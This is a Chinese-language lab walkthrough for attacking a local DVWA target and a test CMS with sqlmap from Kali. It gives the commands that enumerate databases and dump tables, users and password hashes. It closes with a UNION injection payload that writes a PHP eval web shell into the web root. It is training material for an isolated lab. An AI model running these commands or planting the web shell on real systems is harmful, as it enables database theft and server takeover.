使用sqlmap

實驗環境要求: php

一、安裝win7或win10的筆記本或PC電腦一臺,硬盤100GB,內存8GB html

二、安裝VMware® Workstation 14以上 web

整體目標:基於centos7搭建dvwa web服務靶機,使用主機上的瀏覽器和kali虛擬機做爲攻擊機。使用kali中的sqlmap攻擊dvwa上的sql注入和sql盲注漏洞。 sql

任務1、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(low) shell

  1. 測試dvwa注入點,截圖

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 數據庫

  1. 列出全部數據庫,截圖

  1. 獲取數據表,截圖

  1. 獲取數據,截圖

  1. 獲取全部管理用戶,截圖

  1. 獲取用戶密碼,截圖

任務2、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(medium) centos

  1. 測試dvwa注入點,截圖

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0" 瀏覽器

觀察能夠看出爲POST表單 cookie

使用Burp劫獲POST信息 測試

將信息保存成文件

使用文件進行攻擊

  1. 列出全部數據庫,截圖

  1. 獲取數據表,截圖

  1. 獲取數據,截圖

  1. 獲取全部管理用戶,截圖

  1. 獲取用戶密碼,截圖

任務3、使用kali中的sqlmap攻擊dvwa中sql注入漏洞(high)

  1. 測試dvwa注入點,截圖

sqlmap -u "http://192.168.91.80/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=high;PHPSESSID=vjv7i3sc3dscsquhofdlfqf5e0"

觀察頁面信息爲POST表單

原始方法確定不行,因此再試試剛纔的方法

保持請求

試事後發現失敗

查看源碼後使用二階SQL注入—second-order

 

  1. 列出全部數據庫,截圖

  1. 獲取數據表,截圖

  1. 獲取數據,截圖

  1. 獲取全部管理用戶,截圖

  1. 獲取用戶密碼,截圖

 

拓展任務1、使用kali中的sqlmap攻擊cms中sql注入漏洞

  1. 測試cms注入點,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1

  1. 列出全部數據庫,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –dbs

  1. 獲取數據表,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1 -D dvwa –tables

  1. 獲取數據,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1 --dump -D dvwa

  1. 獲取全部管理用戶,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –users

  1. 獲取用戶密碼,截圖

sqlmap -u http://192.168.91.80/cms/show.php?id=1 –passwords

 

拓展任務2、經過sql注入漏洞獲取sql-shell和os-shell

  1. 使用sqlmap查看當前用戶是否爲dba,截圖

  1. 使用sqlmap獲取sql-shell,截圖

  1. 使用sqlmap獲取os-shell,截圖

直接使用命令是錯誤的

咱們須要在靶機修改一些參數來實現

重啓服務

  1. 經過sql注入漏洞上傳一句話木馬,截圖

1' union select 1,"<?php @eval($_POST['pass']);?>" INTO OUTFILE "/var/www/html/dvwa/hack.php" #

執行不了說明沒有權限,修改dvwa文件權限

    

相關文章
相關標籤/搜索